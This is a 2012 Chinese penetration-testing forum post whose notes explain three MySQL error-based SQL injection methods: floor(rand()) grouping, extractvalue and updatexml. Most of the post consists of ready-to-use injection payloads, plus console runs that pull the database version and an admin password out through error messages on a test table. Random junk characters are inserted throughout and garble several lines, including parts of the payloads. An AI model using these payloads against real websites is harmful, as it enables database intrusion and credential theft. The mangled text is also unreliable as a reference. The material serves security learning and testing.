中国网络渗透测试联盟

标题: 关于Mysql注入过程中的三种报错方式 [打印本页]
作者: admin    时间: 2012-12-10 10:28
标题: 关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。8 X3 E0 x$ n3 q# d
实际测试环境:1 z  }3 a* W3 ?7 @
# i, \$ T: G5 d6 a: t" n/ s( Z
# U7 v. X/ \1 r2 |
mysql> show tables;
0 u) e1 p4 R% r0 v2 j! l, K+----------------+9 B3 f# n7 e+ V! Y; a, J+ `
| Tables_in_test |
- S/ _+ Q; Z2 k& S+----------------+
8 L% Y6 o/ h9 f5 }$ ]2 j8 u| admin          |. Y3 U, A* J/ C8 J
| article        |4 w9 F7 F7 Z# U9 x& A
+----------------+
7 g5 Y% ~9 B1 c! p3 p" d1 L
; W. q) Y6 {  _, \4 L# p: b6 n * t4 w- Q1 M- B/ e: I

/ e7 ]$ O; \5 W- O* M, [mysql> describe admin;9 U* a- Q- L/ G0 ^. Q# {" U7 d# f2 e
+-------+------------------+------+-----+---------+----------------+
0 E( E$ q! ~% x- `| Field | Type             | Null | Key | Default | Extra          |5 ]# a4 W* b0 B
+-------+------------------+------+-----+---------+----------------+4 J4 \3 S6 \' `1 H  }
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |6 H; Q7 K2 w7 W' d* Q  y
| user  | varchar(50)      | NO   |     | NULL    |                |% U, k$ o+ t4 f# |
| pass  | varchar(50)      | NO   |     | NULL    |                |
/ q& L3 H1 {" Z$ H: m3 Q- F& F+-------+------------------+------+-----+---------+----------------+9 n( t4 i& z/ a* g

( V3 O0 U4 X3 A: I" C- k5 n 0 m( h1 c$ l# d8 b; J0 R" _

# l, E, g" q3 X' F& k' vmysql> describe article;
" f9 |# I( n2 t- W8 ~+---------+------------------+------+-----+---------+----------------+
- k# o- n/ E* [- P' w| Field   | Type             | Null | Key | Default | Extra          |) Y4 U8 x4 _5 T& t9 {4 w' W$ v
+---------+------------------+------+-----+---------+----------------+
+ |  |* A- w2 K1 v7 C' || id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |; D' a" c" J$ t- d
| title   | varchar(50)      | NO   |     | NULL    |                |
8 v8 g% F& b8 w+ _+ ~! B, ^| content | varchar(50)      | NO   |     | NULL    |                |
5 q5 p" t! i6 t! K+---------+------------------+------+-----+---------+----------------+
; R: \4 v9 K1 I. o3 \$ }1、通过floor报错! w& R3 S6 {  Q/ ^
可以通过如下一些利用代码2 K9 z) }. Z" v* `! A7 a6 R$ r
5 n. q$ m' o$ s2 ^- ]

& d! w" X/ P& p; s; G0 aand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x* E2 I6 r8 @* L: g
from information_schema.tables group by x)a);
- q; |1 y3 V' {2 f( U) ^4 z
4 ^# G; w* O8 w6 ^! a ) T. \5 E$ {; B$ ~; s: y
and (select count(*) from (select 1 union select null union select !1)x
) ]* c' _. |# o/ S& f2 W/ c* z5 Cgroup by concat((select table_name from information_schema.tables limit 1),( S5 l2 b5 u, B8 I' Y! [( s6 h
floor(rand(0)*2)));
7 V0 Y6 Y: n# C; s+ f举例如下:
2 [1 M+ Y9 ^" w6 X  y8 K; S首先进行正常查询:
3 c, W' h. C4 R. {
5 @' e8 |9 k0 m0 ~  I3 t; m4 jmysql> select * from article where id = 1;4 h2 o1 v9 z. n8 M- P& o  r# L; k
+----+-------+---------+3 b" a1 Z4 p- E/ u
| id | title | content |
. f: P4 Y8 k1 x. [7 t0 T5 i+----+-------+---------+) |6 x8 f0 `* z5 X" J2 m
|  1 | test  | do it   |
* D0 t0 `/ V2 l1 D) l+----+-------+---------+
4 I$ {8 C' {9 G5 ]& C8 B假如id输入存在注入的话,可以通过如下语句进行报错。
8 M5 ~3 l% `3 q1 O . v7 L, K- i0 z

; G5 k. f$ l2 f* ]4 C$ t) wmysql> select * from article where id = 1 and (select 1 from
0 w- O8 x( e+ x1 x3 o# x1 C(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- C: |) h) T- \+ `4 W9 kERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'! A3 r  J- y. x/ O2 A  r% Y* O
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
( F9 Y/ N8 r5 }, s3 L, k例如我们需要查询管理员用户名和密码:( e" t2 l& u+ e1 r; u3 r
Method1:
7 b8 V6 O* [1 W0 G9 A1 A1 R
% D! P& J2 V0 S1 c+ Q 7 e5 {& S( l$ q3 C
mysql> select * from article where id = 1 and (select 1 from5 y- v: w* z2 K  ]
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
9 ~& ]$ W# [2 H; m' g7 l; Efrom information_schema.tables group by x)a);
4 f2 x8 m* f* u! MERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
9 D, i* p$ g9 f% }1 MMethod2:( C- A7 a: K8 ^1 T$ I4 H

" O1 \% \/ ?, d8 n; O+ a
8 o4 J) |9 s  L+ Gmysql> select * from article where id = 1 and (select count(*)
4 t- s% u( x; q8 U2 \from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),2 H0 t3 C( y* Z6 J- v& v5 I
floor(rand(0)*2)));# m) `0 F3 W1 f0 |
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
+ P, @" s% E6 z5 c; ]& h2、ExtractValue1 b& x$ |4 @$ l. y
测试语句如下
, d  W4 \. n! e$ x3 H: y2 ]
8 [9 ^) _5 o& y8 H+ d" z
9 R) g' {! R4 c" E$ |7 band extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
  G4 m: ]8 x; ?+ P实际测试过程# A( }  f8 v3 `" P5 N  X

$ z* b% j  G9 N: W8 |( t2 r( U
  [6 d8 \+ c+ X+ H9 Dmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,7 Q) i# q+ [- `. K" T
(select pass from admin limit 1)));--/ M+ W! @) F3 E- P  c0 E
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
9 [, Z. l# X# I3、UpdateXml! D* I* n9 [8 H
测试语句9 X0 P' o3 m2 L
7 f5 H2 |4 X( S7 o- [- |

  m) f7 g$ q, c3 q, S* T: Eand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))& M* l9 I8 n7 Y! M" s
实际测试过程
$ p( ?/ U3 b$ t3 Q5 J 6 b2 g: Y2 G; h/ I0 o
% e) h( u8 n! h% s
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24," p9 x/ p+ {4 d& V7 G/ {
(select pass from admin limit 1),0x5e24),1));+ k5 p6 I+ L3 r0 I$ ^% j# {
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
! k4 ~( e4 g7 A5 D, M, o2 eAll, thanks foreign guys.
  |* e: S- j  }1 { $ _! s+ W* T5 Y  `( o) ~
4 P7 i- Z9 _  e1 o: q+ A




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2